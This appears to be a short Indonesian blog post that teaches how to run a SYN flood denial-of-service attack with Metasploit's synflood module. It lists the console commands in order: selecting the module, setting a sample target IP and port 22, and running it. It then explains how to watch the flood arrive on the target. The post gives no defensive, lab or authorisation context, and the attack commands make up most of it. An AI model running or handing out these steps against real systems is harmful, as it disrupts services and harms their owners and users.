Hi all, hari ini mau tulis tentang flood syn menggunakan metasploit. Di tulisan ini, saya anggap metasploit sudah terinstall. Sedikit info tentang flooding, yakni membuat pc target itu menerima syn terus menerus sehingga mengganggu proses transaksi atau request response yang lain di port tersebut.
Berikut step - step flood menggunakan metasploit ;
1. Cari modul flood, search flooding
2. Setelah ketemu, gunakan yang synflood
use auxiliary/dos/tcp/synflood
3. Lihat parameter pada modul tersebut
show options
4. Set RHOST (target host) & RPORT (target port)
set RHOST 192.168.9.22 (contohnya ip yang akan kita flood)
set RPORT 22 (contohnya port 22, yang kita ingin flood)
set TIMEOUT 1
5. Lalu kita lihat lagi parameter di modul tersebut
show options
6. Kemudian kita run
run
7. Lalu kita cek pada ip target, menggunakan tcpdump, ngrep atau tools lain, maka akan terlihat banyak syn yang masuk. Hal ini karna, setiap satu detik pc yang ada metasploit itu melempar syn tanpa menunggu syn+ack dari komputer target
Kira - kira seperti cara kerja. Jika kurang jelas bisa lihat di forum metasploit.
Sekian terima kasih.
0 komentar:
Posting Komentar